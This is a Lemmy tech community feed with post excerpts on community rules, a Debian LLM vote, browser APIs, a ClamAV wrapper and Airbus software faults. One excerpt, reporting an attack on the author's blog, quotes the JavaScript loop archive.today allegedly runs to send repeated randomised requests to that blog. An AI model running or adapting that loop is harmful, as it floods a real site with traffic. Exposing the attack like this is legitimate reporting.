1
13
submitted 7 months ago* (last edited 7 months ago) by Ategon@programming.dev to c/tech@programming.dev

Hey everyone. Just wanted to do a post to pin in the community just to enforce the difference between c/tech and c/technology more since there's been more and more rule breaking posts popping up and I don't want to put more work on maintaining here since there's no dedicated mod team for it atm

This is a community oriented towards underlying tech so for new things happening in the tech world as opposed to misc legislation and company news

Examples of posts that fit here

  • Wi-Fi 8 will bring reliability rather than greater speed
  • App that translates speech to sign language in real-time wins top innovation prize
  • FDA approves breakthrough eye drops that fix near vision without glasses
  • We hacked into a bowling alley computer | The Serial Port
  • Scientists Make First Mechanical Qubit
  • New version of the PNG image standard released

Examples of posts that do not (and should go into c/technology instead)

  • Atlassian moved 4 million Postgres databases to AWS Aurora
  • Verizon Announces CEO Transition
  • Tailwind Labs Cuts 75% Engineers: AI Kills CSS Tools
  • Architecting Consent for AI: Deceptive Patterns in Firefox Link Preview

Since it wasn't being enforced as much some older rule breaking posts are still up but things should be getting enforced more from now on (if something sneaks through and gets large with no presence in the other communities I can leave it up but ideally it would go into c/technology instead)

If someone wants to mod this community feel free to let me know since it doesn't have a mod team atm

2
39
submitted 6 days ago* (last edited 6 days ago) by supersquirrel@lemmy.ca to c/tech@programming.dev

The second Debian vote of the year, General Resolution: LLM usage in Debian is underway. More saliently, it is still underway – Debian Project Lead Sruthi Chandran extended the voting deadline by an extra week. (She was elected in March, in the first project poll of 2026.)

3
103
4
8

The Idle Detection API provides a means to detect the user's idle status, active, idle, and locked, specifically, and to be notified of changes to idle status without polling from a script.

5
1

A summary of the status of searchmysite.net on its 6 year anniversary.

6
1

A minimal Node.js wrapper around ClamAV that scans any file and returns a typed Verdict Symbol:

  • Verdict.Clean
  • Verdict.Malicious
  • Verdict.ScanError

Zero runtime dependencies. No daemon. No cloud. No native bindings. Works locally via clamscan or remotely via clamd TCP socket (Docker-friendly).

npm install pompelmi

Repo: https://github.com/pompelmi/pompelmi

7
-7
8
8
submitted 5 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
9
21
submitted 6 months ago by Aatube@thriv.social to c/tech@programming.dev

note to mods: this is an opinion article, but it contains a lot of newsworthy statistics and prose on Maven (Java ecosystem package repository) being used as a CDN

10
-3
11
16

Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog. All users encountering archive.today’s CAPTCHA page currently load and execute the following Javascript

        setInterval(function() {
            fetch("https://gyrovague.com/?s" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
                referrerPolicy: "no-referrer",
                mode: "no-cors"
            });
        }, 300);
12
31
submitted 7 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
13
162
14
75
submitted 7 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
15
55
submitted 7 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
16
11
submitted 8 months ago by noumenon@lemmy.world to c/tech@programming.dev
17
70
submitted 8 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
18
121
submitted 8 months ago by who@feddit.org to c/tech@programming.dev
19
27
submitted 8 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
20
7
submitted 8 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
21
23
submitted 8 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
22
78
submitted 9 months ago* (last edited 9 months ago) by otter@lemmy.ca to c/tech@programming.dev

If anyone has an article with more technical details on what the solar radiation did, and how they're going to patch it, I'd like to read about it :)

Airbus said it discovered the issue after an investigation into an incident in which a plane flying between the US and Mexico suddenly lost altitude in October.

The JetBlue Airways flight made an emergency landing in Florida after at least 15 people were injured.

The problem identified with A320 aircrafts relates to a piece of computing software which calculates a plane's elevation.

Airbus discovered that, at high altitudes, its data could be corrupted by intense radiation released periodically by the Sun.

The A320 family are what is known as "fly by wire" planes. This means there is no direct mechanical link between the controls in the cockpit and the parts of the aircraft that actually govern flight, with the pilot's actions processed by a computer.

23
9
submitted 9 months ago by sabreW4K3@lazysoci.al to c/tech@programming.dev
24
79
submitted 9 months ago by mac@programming.dev to c/tech@programming.dev
25
-19
submitted 9 months ago* (last edited 9 months ago) by SubArcticTundra@lemmy.ml to c/tech@programming.dev

I don't think we realize how good we have it right now. ChatGPT is unbiased (configurable solely and fully by the user) and truly tries its best to be useful. It's surely a question of time before OpenAI lets advertisers pay them to introduce product placement and subconscious biases into the LLM in exchange for cash. This could make eg. all medical advice it gives make it seem like you need one specific, sponsoring, medication. What alternatives are there for getting the current experience when that happens? I wouldn't mind paying a small subscription to cover compute costs and retain neutrality.

view more: next ›

Tech

3373 readers
1 users here now

A community for high quality news and discussion around technological advancements and changes

Things that fit:

Things that don't fit

Community Wiki

founded 2 years ago
MODERATORS